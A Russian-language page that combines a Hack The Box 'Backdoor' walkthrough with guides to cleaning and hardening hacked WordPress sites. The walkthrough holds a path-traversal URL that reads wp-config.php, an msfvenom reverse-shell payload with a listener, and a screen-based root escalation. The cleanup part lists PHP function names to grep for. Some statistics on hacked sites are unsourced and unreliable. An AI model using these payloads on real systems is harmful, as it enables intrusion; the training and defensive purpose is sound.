Взлом сайта WordPress. Как взломать WordPress в 2022?
В этой статье мы рассмотрим прохождение уязвимой машины Backdoor Hack The Box, в рамках которой будем взламывать сайт на WordPress. Мы найдем уязвимые плагины, будем эксплуатировать уязвимость Path Traversal, научимся использовать Burp и повышать привилегии в системе с помощью пользовательского скрипта.
Еще по теме: Взлом сайта на Django
Лучше подключаться к машине HTB с помощью VPN. И желательно не делать это со своего личного компа, на котором хранится чувствительная информация.
Для начала добавим IP-адрес машины в /etc/hosts:
10.10.11.125 backdoor.htb |
Начнем со сканирования портов. Это стандартная операция при любом пентесте. Сканирование портов позволит определить, какие службы на машине принимают соединение.
Для этого отлично подходит популярный сканер Nmap. Следующий скрипт улучшит результаты сканирования:
#!/bin/bash ports=$(nmap -p- —min-rate=500 $1 | grep ^[0-9] | cut -d ‘/’ -f 1 | tr ‘\n’ ‘,’ | sed s/,$//) nmap -p$ports -A $1 |
Он действует в два этапа. Первый производит просто быстрое сканирование, второй — глубокое сканирование, используя имеющиеся скрипты (опция —A)
Работа скрипта NmapСканер нашел два открытых порта:
- 80 — веб‑сервер Apache 2.4.41;
- 22 — служба OpenSSH 8.2p1.
SSH смело пропускаем, там делать нечего.
Справка: брутфорс учеток
У нас пока нет учетных данных, поэтому нет смысла в анализе служб, которые как правило требуют авторизации (например, SSH). Единственное, что можно сделать на данном этапе — перебрать пароли брутом, но уязвимые машины с Hack The Boxt практически всегда имеют другие решения. В реальности таких вариантов может не быть, но можно всегда использовать социальную инженерию.
Начнем с изучения веб‑сервера. Результат сканирования Nmap указывает на WordPress 5.8.1.
Главная страница HTB BackdoorКстати, такую информацию можно можно получить, запустив инструмент whatweb.
whatweb http://backdoor. htb |
Сканирование сайта WordPress инструментом whatweb
При взломе сайтов WordPress стоит начинать с утилиты wpscan. Инструмент позволяет обнаружить устаревшие и зачастую уязвимые версии движка WordPress, установленных плагинов и тем, а также получить список учеток с последующим брутом.
Перед началом использования, стоит зарегистрироваться на сайте и получить токен для API.
Зачастую уязвимости присутствуют в установленных плагинах, поэтому я начал с их перебора (параметр -e ap), с агрессивным режимом (параметр —plugins-detection aggressive) и установил 100 потоков (параметр -t 100).
wpscan —url http://backdoor.htb/ -e ap —plugins-detection aggressive -t 100 |
Обнаруженные плагины на сайте WordPress
Потратив несколько минут, мы получаем отчет, в котором отмечены два плагина. Об уязвимостях ничего не говорится, но в ebook-download не проиндексирован каталог, что позволяет просмотреть его содержимое.
Содержимое каталога ebook-downloadИз файла readme.txt узнаем версию плагина — 1.1. Странно, ведь сканер отобразил 1.5.
Содержимое файла readme.txtПытаемся найти известные уязвимости и эксплоиты для ebook-download 1.1 и находим PoC.
Справка: поиск готовых эксплоитов
При пентесте лучше всего искать эксплоиты в Google, поскольку этот поисковик заглядывает и в личные блоги, и в самые разные отчеты. Ускорят дело специализированные сайты для поиска уязвимостей вроде Exploit-DB — там часто можно обнаружить подходящие варианты. Если вы работаете в специализированной ОС вроде Kali Linux, то эта база у вас уже есть и для поиска можно использовать утилиту searchsploit.
Эксплоит для взлома сайта WordPress
Уязвимость и эксплоит очень простые. Это path traversal, то есть возможность обращаться к родительскому каталогу ( ../) при указании пути к файлу. Три таких шага, и мы выбираемся в корневую директорию WordPress, где можем прочитать файл с конфигурацией.
http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php |
Содержимое файла wp-config.php
Здесь хранятся учетные данные для подключения к базе данных. Первая идея — попробовать эти учетные данные для логина по SSH (не вышло) и доступа к панели администрирования WordPress, расположенной в каталоге /wp-admin/. Авторизоваться на сайте также не вышло.
Тогда мы можем поискать другие интересные файлы и получить больше информации с сервера. Я использовал список с такими файлами и потратил много времени на их просмотры, ведь мы можем прочитать почти все, для чего хватает привилегий. И ничего интересного, кроме файла:
/proc/self/cmdline |
Содержимое файла /proc/self/cmdline
Файловая система /proc — это специальная ФС, которая есть во многих современных UNIX-системах.
Внутри каталога /proc — огромное число других каталогов с цифровыми названиями. Имя каждого такого каталога соответствует идентификатору работающего в системе процесса (PID). А файл /proc/[pid]/cmdline содержит аргументы командной строки, с которыми был запущен процесс. Идентификатор self указывает на текущий процесс.
После этой находки у меня возникла идея проверить аргументы командной строки всех процессов, вдруг какому‑то из них были переданы учетные данные. С помощью Burp Intruder можно перебрать идентификаторы. Это легко сделать, указав Numbers в качестве типа нагрузки и промежуток перебора от 0 до 10 000 с шагом 1.
Burp Intruder — Payloads
Результаты перебора
Учетных данных не находим, зато отмечаем, что на порте 1337 запущен gdbserver. Мы не знаем версии, поэтому попробуем найти просто самый новый эксплоит.
Первая же ссылка в Google наводит нас на скрипт, который эксплуатирует RCE-уязвимость в gdbserver 9.2. Чтобы воспроизвести это, сгенерируем файл с нагрузкой при помощи MSFvenom:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.73 LPORT=4321 PrependFork=true -o rev.bin |
Затем с использованием netcat создадим листенер для приема бэкконнекта.
Справка: реверс-шелл
Обратный шелл — это подключение, которое активирует атакуемая машина, а мы принимаем и таким образом подключаемся к ней, чтобы выполнять команды от лица пользователя, который запустил шелл. Для приема соединения необходимо создать на локальной машине listener, то есть «слушатель».
В таких случаях пригодится rlwrap — readline-оболочка, которая в числе прочего позволяет пользоваться историей команд. Она обычно доступна в репозитории дистрибутива.
В качестве самого листенера при этом можно использовать широко известный netcat.
rlwrap nc -lvp [port] |
Для этого выполним такую команду:
rlwrap -cAr nc -lvnp 4321 |
И запустим эксплоит.
Выполнение эксплоитаБэкконнект от сервера
Получаем интерактивную TTY-оболочку и читаем первый флаг — пользовательский.
python3 -c «import pty;pty.spawn(‘/bin/bash’)» |
Флаг пользователя
Для захвата флага рута нам понадобится повысить привилегии в системе. Самые очевидные шаги для этого — проверить настройки sudoers, приложения с выставленным битом SUID, прослушиваемые на локальном хосте порты и список запущенных приложений. Везет с последним пунктом. Мы находим работающий в системе пользовательский скрипт.
Список запущенных процессовНа хосте каждую секунду запускается команда find:
find /var/run/screen/S-root/ -empty -exec screen -dmS root |
Если она находит процесс screen, то выполняет действие exec, что приведет к запуску screen в автономном режиме (причем запущенном от имени суперпользователя). То есть мы можем запустить screen и подключиться ко второму, запущенному командой find привилегированному процессу.
export TERM=xterm screen -x root/root |
Это дает нам привилегированный шелл.
Флаг рутаСайт WordPress взломан. Машина захвачена!
Полезные ссылки:
- Как искать уязвимости сайта
- Как взломать сайт с помощью SQLMap
2 Примера взлома и лечения Вордпресс
Вы не ожидаете этого, и затем это — Бум! — случается. Ваш сайт взломали. Это может случиться с каждым, и однажды это случилось со мной.
В одном случае IP, на котором находился сайт, был занесен в списки вредоносных и е-мейлы не доходили до адресатов. В другом случае хостинг изолировал сайт и отключил возможность отправлять е-мейлы.
В случае взлома страдает не только зараженный сайт, но и другие сайты на том же IP, все сайты теряют репутацию у поисковиков.
В этой статье вы узнаете, как найти заражение и удалить его с сайта, и как удалить сайт из списков вредоносных сайтов.
Содержание:
- Как хакеры взламывают сайты
- Что случилось с сайтами
- Как хакеры взламывают сайты
- Подбор логина и пароля
- Устаревшая версия ПО
- Бэкдоры
- Базовые требования к безопасности сайта
- Типичный взлом сайта
- Фармацевтические взломы
- Вредоносные редиректы
- Тестирование и очистка сайта после взлома
- Сервисы проверки сайта на наличие вредоносного ПО
- Удаление вредоносного кода
- Обновите ПО, смените пароли, ключи и соли
- Как удалить сайт и IP из черных списков
- Плагины для очистки сайта
Как хакеры взламывают сайты
Существует много способов взломать сайт. Простые способы — подбор логина и пароля и известные уязвимости в устаревшем ПО, описание которых находится в открытом доступе. Более сложные — бэкдоры, фишинг, xss-атаки, sql-инъекции и многие другие.
В данный момент на Вордпрессе работает более 43% всех сайтов в Интернете, это более 100 млн. сайтов. Около 65% всех сайтов, использующих CMS, используют Вордпресс. Такая популярность привлекает хакеров, то есть, если они найдут какую-то уязвимость в Вордпресс, они смогут получить тот или иной контроль над большим количеством сайтов.
Хакеры создают ботов, которые автоматически обходят сотни тысяч сайтов и сканируют их на наличие устаревшего ПО, описание уязвимостей которого находится в открытом доступе. Когда бот находит сайт с устаревшим софтом, он использует имеющуюся у него методику взлома этого ПО, отсылает сообщение хакеру и идет дальше.
Обычно после взлома взломщики публикуют свою рекламу на сайте, начинают рассылать спам по своим базам или спискам подписчиков взломанного сайта, или взломанный сайт работает в качестве редиректа посетителей на сайты хакеров.
Тогда ссылка на взломанный сайт появляется в интернет-спаме, поисковики это видят и понижают сайт в поисковой выдаче.
Хакеры не используют свои сайты для рассылки спама или для создания сети редиректов на свои сайты, потому что их сайты попадут в спам-фильтры и под санкции поисковых систем.
Вместо этого они взламывают чужие сайты и используют их. После того, как взломанные сайты попадают в фильтры и под санкции, хакеры оставляют эти сайты, взламывают другие и пользуются ими.
Что случилось с сайтами
На первом сайте хакеры взломали устаревшую версию Вордпресс. Хотя на сайте были сложные логин и пароль, на нем не был установлен плагин безопасности, который мог бы предупредить об изменении в файлах.
На втором сайте хакеры создали бэкдор, создали еще одного пользователя, опубликовали несколько статей со ссылками на что-то фармацевтическое и начали рассылать спам по своим базам.
На первом сайте удалось найти инфицированные файлы и вылечить их, на втором сайте сделали бэкап и восстановили сайт до состояния, которое было до заражения.
На обоих сайтах после восстановления были заменены пароли к сайту, FTP, хостингу и ключи и соли.
Как хакеры взламывают сайты
4 основных способа, которыми хакеры взламывают сайты:
- Слабые пароли
- Устаревшее ПО
- Небезопасные темы и плагины
- Уязвимости в ПО хостинга
Существует много других способов, но эти способы самые распространенные.
- Топ-6 уязвимостей WordPress
Подбор логина и пароля
По умолчанию в Вордпресс нет ограничений на количество попыток ввести логин и пароль. Если вы оставите как есть, хакер может пробовать подбирать правильную комбинацию неограниченное количество раз. Это называется brute force attack, атака грубой силой или атака методом перебора паролей.
Вы можете ограничить количество попыток авторизации с помощью плагина, например Login LockDown. Еще один способ — перенесите страницу авторизации на новый адрес, например сайт.ru/login
.
- Как изменить имя пользователя Вордпресс
- 2 Способа изменить страницу входа в админку Вордпресс
- Как установить пароль на wp-login. php (wp-admin)
Устаревшая версия ПО
Описания уязвимостей устаревших версий Вордпресс, плагинов и тем находятся в Интернете. У ботов есть эти описания. Когда они находят сайт с устаревшей версией ПО, они взламывают этот сайт по уже имеющемуся алгоритму.
Чтобы обезопасить сайт от таких атак, всегда используйте последнюю версию софта.
- Почему у вас должна быть последняя версия Вордпресс
- Ручное и автоматическое обновление Вордпресс
- Как скрыть версию Вордпресс, плагинов и тем
Бэкдоры
Хакер сохраняет файл со специальным скриптом на сервере, который позволяет ему заходить на сайт в любое время, при этом хакер не пользуется стандартной страницей входа, а заходит на сайт через созданный им бэкдор.
Чтобы замаскировать созданный файл, хакеры называют его так, чтобы он выглядел как часть ядра Вордпресс, например, users-wp.php, php5.php, sunrise.php или что-нибудь подобное.
Если у вас не установлен какой-нибудь плагин, который предупреждает об изменениях в файлах, может быть довольно трудно определить, что вредоносный файл был добавлен. Есть несколько признаков, которые могут дать понять, что сайт был взломан.
Если вы открываете фронтэнд или бэкэнд сайта, и видите сообщение в браузере, что посещение этого сайта может быть небезопасно, то ваш сайт может быть взломан.
Если вы видите такое сообщение, то ваш сайт мог быть взломан.Другой признак — антивирус на компьютере показывает сообщение, что посещение этого сайта может быть опасно. Бэкдоры могут запускать вредоносный код, или вирусы, например трояны, когда посетитель заходит на сайт.
Еще один признак — е-мейлы, которые вы отправляете с сервера, возвращаются обратно с SMTP ошибкой 550. От некоторых серверов, которым вы отправляли е-мейл может вернуться более подробное описание проблемы. Например, ссылка на сайты, которые поместили ваш сайт или ваш IP в список сайтов, содержащих вредоносное ПО.
- Как найти и удалить бэкдоры на Вордпресс сайте
Базовые требования к безопасности сайта
Эти требования — необходимый минимум для безопасности сайта.
- Регулярно обновляйте Вордпресс, скрипты, плагины и темы.
- Используйте сложные логины и пароли.
- Установите плагин для ограничения попыток авторизации.
- Выбирайте плагины и темы от проверенных авторов.
- Используйте надежный хостинг.
- Настройте автоматический бэкап всех файлов и базы данных.
Читайте Минимальная безопасность сайта.
Типичные взломы сайтов
Хакеры взламывают сайты для рассылки спама, редиректа на свои сайты, кражи личных данных и использования сервера в качестве хранилища какой-нибудь информации или файлообменника. В большинстве случаев сайты взламываются автоматически хакботами.
Фармацевтические взломы
Если вы видите на своем сайте ссылки на другие сайты, которые вы не добавляли, или вас или ваших посетителей перенаправляет на другие сайты, это называется фармацевтические или фарма хаки.
Текст или ссылки указывают на полулегальные спам сайты, которые продают поддельные часы, кошельки, Виагру и тому подобное.
Хакер добавляет скрипты в файлы сайта, обычно в хедер, иногда в другие части страниц. Эти ссылки или текст могут быть скрыты или незаметны для посетителей, но видны поисковым системам.
Введите в поисковике запрос site:ваш-сайт.ru
, и посмотрите, как ваш сайт выглядит в поиске.
В поисковой выдаче вы должны видеть только название страниц и их описание. Если вы видите что-то подобное, значит, ваш сайт взломали.
Попробуйте вставить ссылку на какую-нибудь страницу вашего сайта в Фейсбук, ВКонтакте или Вотсапп. Если вы увидите что-то постороннее в описании или названии, это значит, что ваш сайт взломан.
Вредоносные редиректы
Хакер вставляет скрипт в файл .htaccess или другие главные файлы сайта, который перенаправляет посетителей на другие страницы или другой сайт. Это называется вредоносный редирект.
Не заметить такой взлом очень сложно, потому что вместо загрузки вашего сайта загрузится другой сайт.
Иногда редирект может быть не таким очевидным, если взломанный файл использует стили вашей темы. Тогда вы увидите большое количество рекламы на странице, которая выглядит похожей на ваш сайт.
Редиректы могут быть настроены только с некоторых страниц сайта или со всего сайта целиком.
Тестирование и очистка сайта после взлома
Перед тем, как вы начнете что-то делать, сделайте полный бэкап всего сайта и базы данных. Даже несмотря на то, что сайт взломан, позже вам может понадобиться какая-то информация.
- Бэкап Вордпресс
Чтобы не допустить заражения других сайтов, некоторые хостинги могут отключить или удалить ваш сайт, когда узнают, что сайт взломан, особенно на дешевых тарифах виртуальных хостингов.
Если логи событий находятся не в основной папке сайта, то сохраните их на компьютер, так как они хранятся на сервере несколько дней, после чего заменяются новыми.
После того, как вы сохранили бэкап и логи на компьютер, можно начинать лечение сайта.
- Как найти следы взлома в логах сервера
Проверьте сайт в этих сервисах:
Даже если вы точно знаете, что сайт взломали, проверьте его еще раз в этих сервисах. Вы можете найти еще какие-то вирусы, кроме тех, которые вы уже нашли.
- Unmask Parasites — довольно простой сервис для проверки сайта. Первый шаг, чтобы определить, был ли сайт взломан.
- Sucuri Site Check — хороший сервис для поиска заражений на сайте. Показывает, внесен ли сайт в списки вредоносных сайтов. На данный момент 9 списков.
- Norton Safe Web – сканер сайта от Norton.
- Quttera – сканирует сайт на наличие вредоносного ПО.
- 2ip — проверяет на вирусы и включение в черные списки Яндекса и Гугла.
- VirusTotal – крутейший сервис для сканирования сайтов, использует более 50 разных сканеров — Касперского, Dr.Web, ESET, Yandex Safebrowsing и других. Можно просканировать сайт, IP адрес или файл.
- Web Inspector – еще один хороший сервис, проверяет сайт на наличие червей, троянов, бэкдоров, вирусов, фишинга, вредоносного и подозрительного ПО и так далее. В течение пары минут генерирует довольно детальный отчет.
- Malware Removal – сканирует сайт на наличие вредоносного ПО, вирусов, внедренных скриптов и так далее.
- Scan My Server – сканирует сайт на вредоносный софт, SQL внедрения, XSS и так далее. Для использования требуется бесплатная регистрация. Довольно детальные отчеты приходят на е-мейл раз в неделю.
Проверьте сайт во всех сервисах, так как они сканируют немного по-разному и находят разные типы инфекций. Также просканируйте свой компьютер.
В статье Как проверить и вылечить от вирусов Вордпресс сайт описан способ найти вредоносный код в файлах сайта, используя команды в SSH терминале.
Начните с поиска файлов, измененных в течение последних 2-х дней:
find /путь/к/вашему/сайту/папка/ -mtime -2 -ls
Замените /путь/к/вашему/сайту/папка/
на путь к вашей папке, и пройдите поиском по каждой папке.
Если вы ничего не нашли, увеличьте поиск до 5 дней:
find /путь/к/вашему/сайту/папка/ -mtime -5 -ls
Если вы снова ничего не нашли, увеличивайте интервал поиска, пока не найдете изменения. Не забывайте, что обновления ПО тоже изменения.
Еще одна команда, которую вы можете использовать для поиска — «grep». Эта команда поможет найти вредоносный код, который добавил хакер.
После того, как вы нашли файлы, в которых хакер сделал изменения, вы можете попробовать найти в них повторяющиеся фрагменты, например, base64
или hacker was here
.
grep -ril base64 *
Замените base64
на повторяющееся сочетание, которое вы нашли в измененных файлах. Результат покажет вам список файлов, в которых встречается это сочетание.
Хакеры часто используют эти функции:
- base64
- str_rot13
- gzuncompress
- eval
- exec
- create_function
- system
- assert
- stripslashes
- preg_replace (/e/)
- move_uploaded_file
Если вы хотите увидеть содержание этих файлов, используйте этот запрос:
grep -ri base64 *
Замените base64
на значение, которое вы нашли в измененных файлах.
Более аккуратный запрос может быть таким:
grep --include=*.php -rn . -e "base64_decode"
Результат этого запроса показывает номера строк, в которых содержится сочетание «base64_decode», в тех файлах, которые заканчиваются на .php.
Более простой способ:
Скопируйте сайт с сервера, удалите все что можно безопасно удалить, заархивируйте целиком или разделите на архивы и проверьте архивы на VirusTotal или 2ip. Также можно проверить на компьютере антивирусом. Перенесите все зараженные файлы из архива в отдельную папку.
После того, как вы нашли файлы с внедренным код, их можно восстановить или удалить.
Удаление вредоносного кода
- Если вы нашли файл бэкдора, в котором находится только скрипт хакера, удалите этот файл.
- Если вы нашли вредоносный код в файле Вордпресс, темы или плагина, удалите этот файл и скачайте новый из репозитария Вордпресс или с сайта разработчика.
- Если вы нашли вредоносный код в файле, который вы создавали, удалите хакерский код и сохраните файл.
- Возможно, у вас в бэкапе есть незараженная версия сайта, вы можете восстановить сайт из старой версии. После восстановления обновите Вордпресс, плагины и тему, смените пароль и установите плагин безопасности.
Очистите сайт и просканируйте его еще раз на интернет сервисах проверки.
Обновите ПО, смените пароли, ключи и соли
После того, как вы удалили вредоносный код, обновите Вордпресс, плагины и темы. Смените пароли на сайте и на хостинге. Подумайте о смене пароля к е-мейлу и базе данных (в файле wp-config.php и на хостинге).
Смените ключи и соли, это сделает все cookies, которые хранятся в браузерах пользователей, в том числе хакеров, недействительными для авторизации на сайте.
Генератор ключей и солей находится на сайте Вордпресс. Скопируйте новые ключи и вставьте их в файл wp-config в этом месте:
Перед изменением файла wp-config сделайте его бэкап. Сохраните файл, закачайте обратно на сервер.
Как удалить сайт и IP из черных списков
После того, как вы очистили сайт, он все еще может находиться в списках сайтов, содержащих вредоносное ПО или в спам списках. Сначала нужно узнать, на каких сайтах ваш сайт или IP занесены в черный список.
Здесь вы можете узнать, занесен ли ваш сайт в списки malware или phishing сайтов Гугл.
https://transparencyreport.google.com/safe-browsing/search?url=ваш-сайт.ru
Замените ваш-сайт.ru
на ваш адрес.
Проверьте сайт на сервисах Unmask Parasites, Spamhaus и 2ip.ru. Спамхаус показывает на каких сайтах IP сайта внесен в списки вредоносных, так что вы можете узнать, на каких сайтах вам нужно перенести IP из черных списков.
http://www.spamhaus.org/query/ip/123.45.67.890
Замените 123.45.67.890
на IP сайта. Узнать IP.
Spamhaus покажет сайты, которые занесли ваш IP в список вредоносных.
Когда какой-то сайт заносит IP в черный список, он отображается красным.
Откройте красные ссылки в новом окне и следуйте инструкциям. У всех сайтов инструкции могут быть разными, поэтому читайте внимательно.
Обычно запрос проверки делается в несколько кликов, и занимает около 2 дней. Некоторые сайты не предупреждают о переносе IP из черного списка в белый список, поэтому вы можете вернуться на Спамхаус через несколько дней, и проверить снова.
На некоторых сайта можно запросить проверку только один раз, поэтому убедитесь, что сайт полностью очищен, иначе ваш IP может остаться в черных списках надолго.
- Как очистить сайт от вирусов и удалить его из черных списков
Плагины, которые помогут очистить сайт
Если вы хотите найти хак с помощью плагина, попробуйте использовать эти плагины:
- Anti-Malware Security and Brute-Force Firewall
- NinjaScanner
- Quttera Web Malware Scanner
- Antivirus
- WP Antivirus Site Protection
Некоторые большие плагины могут помочь найти место взлома, но обычно бесплатные версии предназначены только для защиты сайта.
Если ваш сайт еще не взломали, установите один из этих плагинов:
Sucuri Security
В платной версии Sucuri предлагает защиту самого высокого класса — файрвол на уровне DNS, который сканирует каждый запрос к сайту. Ускорение сайта с помощью кеширования и подключения к собственному CDN, и бесплатное восстановление сайта, если сайт был взломан. Также сервис проверяет, что сайт не занесен в черные списки.
В бесплатной версии плагин сравнивает файлы ядра Вордпресс и файлы в репозитории Вордпресс, ведет логи событий, имеет несколько основных настроек безопасности. В случае появления подозрительной активности плагин посылает сообщение на е-мейл.
У плагина есть главная панель, в которой сообщается, что файлы на сервере соответствуют файлам в репозитарии Вордпресс, на сайте не обнаружено вредоносного кода, сайт не занесен в черные списки и показаны логи событий. Это очень удобный инструмент для наблюдения за безопасностью сайта.
- Подробное описание Sucuri Security
Wordfence
Один из самых известных и мощных плагинов безопасности Вордпресс. Платная и бесплатная версии обнаруживают вредоносный код и защищают сайт практически от всех видов угроз. База данных плагина постоянно обновляется, поэтому все новые угрозы попадают в базу данных. Через 30 дней база обновляется в бесплатной версии.
В Wordfence есть функция обнаружения изменений или добавления файлов. Когда существующий файл обновляется или добавляется новый файл, Вордфенс сообщает об этом и предлагает отменить изменение или удалить файл.
В Вордфенсе есть функция сканирования файлов на своем сервере, встроенный файрвол на уровне сайта и множество других функций.
iThemes Security
iThemes Security — мощный плагин из тройки лидеров. У него есть база с последними хаками, бэкдорами и другими угрозами.
Бесплатная версия хорошо защищает чистый сайт, но если вы хотите знать, когда файлы изменялись и делать подробный скан сайта, вам нужно купить премиум версию.
Еще одна крутая функция этого плагина — бэкап сайта. Если вы узнали, что сайт был взломан, вместо поиска взлома вы можете восстановить более раннюю версию сайта.
All in One WP Security & Firewall
Большой бесплатный плагин со множеством настроек, имеет встроенный файрвол, защищает файлы сайта и базу данных. В платной версии есть сканер сайта на наличие вредоносного ПО.
Проверяет файлы и базу данных, сообщает, были ли какие-то изменения, меняет стандартную страницу авторизации, скрывает версию Вордпресс, меняет префикс базы данных и еще десятки других функций. Ко всем функциям есть подсказки — описания.
Плагин скорее предназначен для предупреждения заражений, чем для лечения, поэтому его лучше устанавливать на свежий или вылеченный сайт. На мой взгляд, лучший бесплатный плагин.
Security Ninja
Один из самых простых, но мощных премиум плагинов безопасности. В бесплатной версии проверяет сайт на наличие типичных уязвимостей и предлагает инструкции по устранению этих уязвимостей.
В платной версии добавляется сканер ядра, который сравнивает файлы вашей установки Вордпресс с оригинальными файлами на сайте Вордпресс, сканер сайта на наличие вредоносного ПО и облачный файрвол, в который добавляются IP, распространяющие вредоносное ПО и спам.
Весь плагин можно настроить за 15 минут. Плагин платный, но имеет лайф-тайм лицензию.
- Подробное описание Security Ninja Pro
- Как усилить защиту Security Ninja Pro до лучших премиум-плагинов безопасности
VaultPress
Плагин безопасности и бэкап плагин в одном от Automattic, часть разработчиков которого являются разработчиками Вордпресс. Есть бесплатная и премиум версия.
Регулярные бэкапы дают возможность восстановить сайт в случае взлома. Дополнительные инструменты безопасности защитят ваш сайт, если обновитесь до премиум версии.
В премиум версии есть функция ежедневного сканирования сайта на наличие вредоносного кода, вирусов, троянов и прочей заразы. Также помогает очищать сайт после заражения.
Theme Check
Этот плагин проверяет код на правильность в теме, которую вы используете. Он сравнивает код темы на соответствие последним стандартам Вордпресс. Если что-то не соответствует этим стандартам или выглядит подозрительным, плагин сообщает об этом.
Если вы выбираете тему для использования, проверьте ее этим плагином.
Plugin Security Scanner
Плагин проверяет темы и плагины на наличие уязвимостей, описание которых он берет в базе WPScan Vulnerability Database.
Плагин сканирует сайт раз в 24 часа, и посылает сообщение администратору сайта, если находит уязвимость в теме или плагине.
Для работы плагина нужно зарегистрироваться в базе WPScan Vulnerability и получить токен, который вставляется в настройках плагина.
Plugin Check
Аналогично с предыдущим плагином, этот плагин проверяет установленные плагины на соответствие стандартам Вордпресс.
Плагин скорее проверяет код на правильность, чем на наличие вредоносного ПО, но это уже хорошо. Большое количество взломов происходит по причине неправильного кода.
Хотя это хороший плагин, но он давно не обновлялся.
- Лучшие плагины защиты Вордпресс
Восстанавливать сайт труднее, чем настроить защиту сайта до взлома. Если ваш сайт еще не взломали, установите один из этих плагинов и читайте Руководство по безопасности Вордпресс.
Если вы не хотите заниматься этими настройками вручную, приглашаю вас на курс Безопасность Вордпресс за 2 вечера. Настроил и забыл. В этом курсе вы настроите автоматическую безопасность Вордпресс с помощью плагинов и нескольких ручных настроек.
Защита будет обновляться автоматически по мере появления новых угроз и по мере появления новых версий ПО. Настроил и забыл →.
Читайте также:
- Чек-лист: Что делать, если сайт взломали
- Как проверить и вылечить от вирусов Вордпресс сайт
- Как найти и удалить бэкдоры на Вордпресс сайте
- Как найти следы взлома в логах сервера
- Как зайти в админку Вордпресс после взлома сайта
Надеюсь, статья была полезна. Оставляйте комментарии.
Взлом WordPress. Защита сайтов на Вордпрессе. Настройка плагина iThemes Security
По статистике 80% сайтов на WordPress когда-либо ранее были взломаны. Около 30% сайтов на этом движке в данный момент находятся под управлением сторонних лиц. 90% владельцев сайтов не знают о взломе 3 месяца и более.
Данная статья основана на собственном опыте восстановления сайтов после взлома и попыток предотвращения несанкционированного доступа к ним.
Сразу скажу, что я не являюсь экспертом по безопасности, все наработки только личного плана и базируются на перманентной борьбе со зловредами.
Чтобы не быть голословными, посмотрите статистику взломанных в настоящее время сайтов наиболее известных хакерских групп.
Группировка NeT.Defacer:
Группировка w4l3XzY3:
И таких бандформирований хаккеров — сотни. А есть еще и одиночки. Кроме того далеко не все хакеры гордо заявляют о взломах — в большинстве случаев они просто эксплуатируют тихонько посторонний сайт: рассылают через него спам, атакуют DDOS-ом какие — то ресурсы, перенаправляют трафик на нужные ресурсы. Некоторые ставят ссылки со сломанных сайтов на продвигаемые ресурсы. В принципе хоть майнить криптовалюту можно — благо js скрипты майнеров известны уже лет 6-7.
Чтобы не допустить подобных вакханалий, нужно хотя бы кратко знать об основных способах взлома сайтов.
Методы взлома сайтов
Всего существует 2 основных способа скомпрометировать сайт — взлом со стороны хостера и взлом непосредственно самого сайта.
Первый способ был широко распространен ранее. Лет 5-8 назад многие хостеры практически стонали, когда, используя уязвимости хостинга через один аккаунт шаред хостинга были взломаны все сайты, размещенные на сервере и большинство аккаунтов пользователей хостинга были скомпрометированы.
Сейчас, как правило, у крупных хостеров ломается единичный аккаунт и заражаются сайты размещенные на нем. Доступа к иным аккаунтам у взломщиков нет.
Второй способ взлома — взламывается непосредственно сайт. Здесь взлом можно подразделить на подбор доступа к системе аутентификации (брутфорс) и на взлом сайта, используя его уязвимости.
Как взломать WordPress сайт
Есть статистика, что только треть WordPress сайтов ломается через уязвимости движка, когда пользователи его не обновляют годами. Большинство взломов Вордпресса осуществляется через уязвимости плагинов и тем. Особое опасение вызывают плагины, размещенные в теме — они практически никогда не обновляются и служат прекрасным полигоном для получения доступа к сайту.
Еще одной особенностью, облегчающей взлом Вордпресса является установка «бесплатных» профессиональных тем и плагинов, скачанных в интернете, а не из репозитория самого Вордпресса или продающих сайтов. Некоторая часть из них уже несет в своем составе бэкдоры, либо возможности их установить. Никогда не пользуйтесь бесплатными темами из интернета.
Одним из способов взлома сайта является его «проверка» на известные уязвимости. Существуют библиотеки этих уязвимостей, которые постоянно пополняются. Потом, по этим библиотекам идет проверка сайта.
Здесь хорошо видно как по библиотеке ищутся уязвимые плагины (1), при этом атака идет со множества IP, а время атаки примерно совпадает (2).
Есть более хитрые перцы. Они проверяют сайты не на уязвимости, а на уже установленные бэкдоры и шеллы. Это взломщики — паразиты второй волны.
Здесь как раз хорошо видно как происходит поиск доступов к шелам.
Особо интересен чудак с китая (1), который скачав диск по поиску уязвимостей (а они есть в доступности), не настроив ничего, начал с одного и того же IP пробивать сайт.
Следующим вариантом взлома сайта являются всевозможные SQL инъекции. Часть из них мы будем отсеивать, при настройке плагина, установив запрет на длинные строки.
Информации по взлому именно WordPress очень много в интернете. Есть куча обучающих пособий, сборок дисков с уже установленным и настроенным софтом.
В целом, понаблюдайте за собственным сайтом и вы порадуетесь тому, сколько раз на день его хотят взломать. А наше дело — этому помешать.
Защита Worpress сайта
Мы рассмотрим способы защиты сайта с использованием плагина iThemes Security (ранее известный как Better WP Security). Сразу скажу — он не панацея. Аккурат перед Новым Годом у меня было взломано 3 сайта, где стоял и работал этот плагин. Поэтому необходим комплексный подход к защите.
Если вы уверены, что ваш сайт не взломан, то:
- Сделайте полный бекап сайта: и базы данных и всех его файлов и сохраните его в надежное место.
- Обновите пароли у всех администраторов сайта.
- Удалите лишних пользователей.
- Обновите движок Вордпресса до актуального.
- Сократите список активированных плагинов, удалив те, функциями которых вы не пользуетесь.
- Подберите аналоги к плагинам, которые перестали обновляться и перейдите на них.
- Удалите «платные» плагины, которые вы не покупали, а скачали с интернета.
- Физически удалите все неактивированные плагины.
- Обновите все плагины.
- Удалите все неиспользуемые темы
- Перейдите на новую тему, если вы её не покупали, а скачали из интернета, а не из репозитория WordPress.
- Обновите тему до актуальной.
Далее, устанавливайте плагин iThemes Security и переходите к его настройке.
Настройка плагина iThemes Security
После его установки и активации запускайте модуль «Security Check» и жмите кнопку Secure Site — будет выполнена первоначальная настройка защиты.
Далее, сразу переходим в закладку Advanced. Там пять модулей, нам необходим «Спрятать страницу входа на сайт«.
Здесь включаем галку «Спрятать страницу входа на сайт» и ниже прописываем слуг, для входа на сайт. Например прописав «puzo1234», доступ к админке будем получать по адресу site.ru/puzo1234.
Остальное оставляем по умолчанию. Сохраняем настройки.
Этот модуль «Прячет страницу входа в систему (wp-login.php, wp-admin, admin и login), чтобы ее сложнее было найти при автоматизированной атаке на сайт». Таким образом мы немного защитились от брутфорса.
Возвращаемся к «рекомендованным» модулям. Запускаем модуль «Основные настройки«.
Здесь включаем флаг «Вносить изменения в файлы» — Allow iThemes Security to write to wp-config.php and .htaccess.»
